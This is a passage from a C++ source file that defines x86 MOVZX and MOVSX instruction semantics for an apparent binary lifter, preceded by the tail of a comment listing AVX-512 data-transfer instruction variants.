DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4878 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4879 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4880 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4881 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4882 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4883 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4908 VPMOVUSDW VPMOVUSDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4909 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4910 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4911 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 
ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4912 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4913 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5292 VPMOVQ2M VPMOVQ2M_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 5293 VPMOVQ2M VPMOVQ2M_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 5294 VPMOVQ2M VPMOVQ2M_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 5515 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5516 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5517 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5518 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5519 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5520 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5521 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5522 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5523 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5524 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5525 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 
ATTRIBUTES: MASKOP_EVEX 5526 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5535 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5536 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5537 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5538 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5539 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5540 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5627 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5628 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5629 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5630 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5631 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5632 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5636 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5637 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX 
MEMORY_FAULT_SUPPRESSION 5638 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5639 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5640 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5641 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5642 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5643 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5644 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5645 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5646 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5647 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5665 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5666 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5667 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5668 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5669 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER 
AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5670 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5671 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5672 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5673 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5674 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5675 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5676 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5902 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5903 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5904 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5905 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5906 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5907 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5931 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER 
AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5932 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5933 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5934 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5935 VPMOVUSWB VPMOVUSWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5936 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5961 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5962 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5963 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5964 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5965 VPMOVSWB VPMOVSWB_YMMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5966 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5990 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5991 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5992 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5993 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX 
MEMORY_FAULT_SUPPRESSION 5994 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5995 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5996 VMOVHLPS VMOVHLPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: 6007 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6008 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6009 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6010 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6011 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6012 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6171 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6172 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6173 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6174 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6175 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6176 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: 
AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6177 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6178 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6179 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6180 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6181 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6182 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6309 VPMOVQW VPMOVQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6310 VPMOVQW VPMOVQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6311 VPMOVQW VPMOVQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6312 VPMOVQW VPMOVQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6313 VPMOVQW VPMOVQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6314 VPMOVQW VPMOVQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6325 VPMOVQB VPMOVQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6326 VPMOVQB VPMOVQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX 
MEMORY_FAULT_SUPPRESSION 6327 VPMOVQB VPMOVQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6328 VPMOVQB VPMOVQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6329 VPMOVQB VPMOVQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6330 VPMOVQB VPMOVQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6331 VPMOVQD VPMOVQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6332 VPMOVQD VPMOVQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6333 VPMOVQD VPMOVQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6334 VPMOVQD VPMOVQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6335 VPMOVQD VPMOVQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6336 VPMOVQD VPMOVQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6349 VPMOVM2Q VPMOVM2Q_XMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 6350 VPMOVM2Q VPMOVM2Q_YMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 6351 VPMOVM2Q VPMOVM2Q_ZMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: */

// Semantics helpers for the x86 move-with-extension family.
// DEF_SEM / DEF_ISEL and the register/memory operand types (R16W, M8, ...)
// are project-defined macros that bind these templates to decoded
// instruction selections.
namespace {

// MOVZX: read the narrower source operand and zero-extend it into the
// wider destination operand.
template <typename D, typename S>
DEF_SEM(MOVZX, D dst, S src) {
  WriteZExt(dst, Read(src));
  return memory;
}

// MOVSX/MOVSXD: sign-extend the source value to the signed type `SextT`,
// then write it to the destination. NOTE(review): WriteZExt presumably
// zero-clears any destination bits above the width of the extended value
// (e.g. upper 32 bits of a 64-bit GPR) -- confirm WriteZExt semantics.
template <typename D, typename S, typename SextT>
DEF_SEM(MOVSX, D dst, S src) {
  WriteZExt(dst, SExtTo<SextT>(Read(src)));
  return memory;
}

}  // namespace

// Instruction selections: MOVZX from 8-bit memory into 16/32/64-bit GPRs.
DEF_ISEL(MOVZX_GPRv_MEMb_16) = MOVZX<R16W, M8>;
DEF_ISEL(MOVZX_GPRv_MEMb_32) = MOVZX<R32W, M8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMb_64) = MOVZX<R64W, M8>;)
// MOVZX from 8-bit and 16-bit register/memory sources.
DEF_ISEL(MOVZX_GPRv_GPR8_16) = MOVZX<R16W, R8>;
DEF_ISEL(MOVZX_GPRv_GPR8_32) = MOVZX<R32W, R8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR8_64) = MOVZX<R64W, R8>;)
DEF_ISEL(MOVZX_GPRv_MEMw_32) = MOVZX<R32W, M16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMw_64) = MOVZX<R64W, M16>;)
DEF_ISEL(MOVZX_GPRv_GPR16_32) = MOVZX<R32W, R16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR16_64) = MOVZX<R64W, R16>;)
// MOVSX: the third template argument selects the signed type used for the
// sign extension (i.e. the destination width).
DEF_ISEL(MOVSX_GPRv_MEMb_16) = MOVSX<R16W, M8, int16_t>;
DEF_ISEL(MOVSX_GPRv_MEMb_32) = MOVSX<R32W, M8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMb_64) = MOVSX<R64W, M8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR8_16) = MOVSX<R16W, R8, int16_t>;
DEF_ISEL(MOVSX_GPRv_GPR8_32) = MOVSX<R32W, R8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR8_64) = MOVSX<R64W, R8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_MEMw_32) = MOVSX<R32W, M16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMw_64) = MOVSX<R64W, M16, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR16_32) = MOVSX<R32W, R16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR16_64) = MOVSX<R64W, R16, int64_t>;)
// MOVSXD variants (32 -> 64 bit sign extension, plus 16/32-bit legacy forms).
